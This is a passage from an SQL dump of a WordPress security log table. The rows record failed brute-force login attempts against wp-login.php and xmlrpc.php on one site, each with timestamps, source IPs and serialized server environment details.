\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6cWYqJrDl1gYLQWcUKAAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061489.4413\";s:12:\"REQUEST_TIME\";s:10:\"1569061489\";}}','notice','2019-09-21 10:24:50','2019-09-21 10:24:49',18316264,19615032,'https://bintara.com.my/blog/xmlrpc.php',1,0,'103.5.150.16'),(25162,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6dFiJ7D9Gn7wDPh8SLwAAAM4\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"131.255.104.69\";s:11:\"REMOTE_PORT\";s:5:\"46346\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6dFiJ7D9Gn7wDPh8SLwAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061492.9847\";s:12:\"REQUEST_TIME\";s:10:\"1569061492\";}}','notice','2019-09-21 10:24:54','2019-09-21 10:24:53',18314752,19609968,'https://bintara.com.my/wp/xmlrpc.php',1,0,'131.255.104.69'),(25163,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6drfBTP0kPOVnb8jn@wAAAEQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.121.110.166\";s:11:\"REMOTE_PORT\";s:5:\"40512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6drfBTP0kPOVnb8jn@wAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061494.6085\";s:12:\"REQUEST_TIME\";s:10:\"1569061494\";}}','notice','2019-09-21 10:24:56','2019-09-21 10:24:54',17799160,19290232,'https://bintara.com.my/2019/wp-login.php',1,0,'91.121.110.166'),(25164,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6eViJ7D9Gn7wDPh8SMQAAANU\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.121.110.166\";s:11:\"REMOTE_PORT\";s:5:\"41544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6eViJ7D9Gn7wDPh8SMQAAANU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061497.5252\";s:12:\"REQUEST_TIME\";s:10:\"1569061497\";}}','notice','2019-09-21 10:25:00','2019-09-21 10:24:57',18403688,19702320,'https://bintara.com.my/2019/xmlrpc.php',1,0,'91.121.110.166'),(25165,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6fWYqJrDl1gYLQWcUOQAAAAY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.224.77\";s:11:\"REMOTE_PORT\";s:5:\"46850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6fWYqJrDl1gYLQWcUOQAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061501.4331\";s:12:\"REQUEST_TIME\";s:10:\"1569061501\";}}','notice','2019-09-21 10:25:03','2019-09-21 10:25:02',17799000,19290384,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.179.224.77'),(25166,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6gmYqJrDl1gYLQWcUPQAAAAw\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.224.77\";s:11:\"REMOTE_PORT\";s:5:\"49122\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6gmYqJrDl1gYLQWcUPQAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061506.3027\";s:12:\"REQUEST_TIME\";s:10:\"1569061506\";}}','notice','2019-09-21 10:25:07','2019-09-21 10:25:06',18311848,19609184,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'108.179.224.77'),(25167,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6ujDrcQxTmGrCWuaG5wAAAcc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"112.78.1.86\";s:11:\"REMOTE_PORT\";s:5:\"55686\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6ujDrcQxTmGrCWuaG5wAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061562.3843\";s:12:\"REQUEST_TIME\";s:10:\"1569061562\";}}','notice','2019-09-21 10:26:04','2019-09-21 10:26:02',17799168,19289256,'https://bintara.com.my/2019/wp-login.php',1,0,'112.78.1.86'),(25168,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6vLfBTP0kPOVnb8joEwAAAFM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"112.78.1.86\";s:11:\"REMOTE_PORT\";s:5:\"60310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6vLfBTP0kPOVnb8joEwAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061565.0682\";s:12:\"REQUEST_TIME\";s:10:\"1569061565\";}}','notice','2019-09-21 10:26:06','2019-09-21 10:26:05',18313872,19610584,'https://bintara.com.my/2019/xmlrpc.php',1,0,'112.78.1.86'),(25169,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 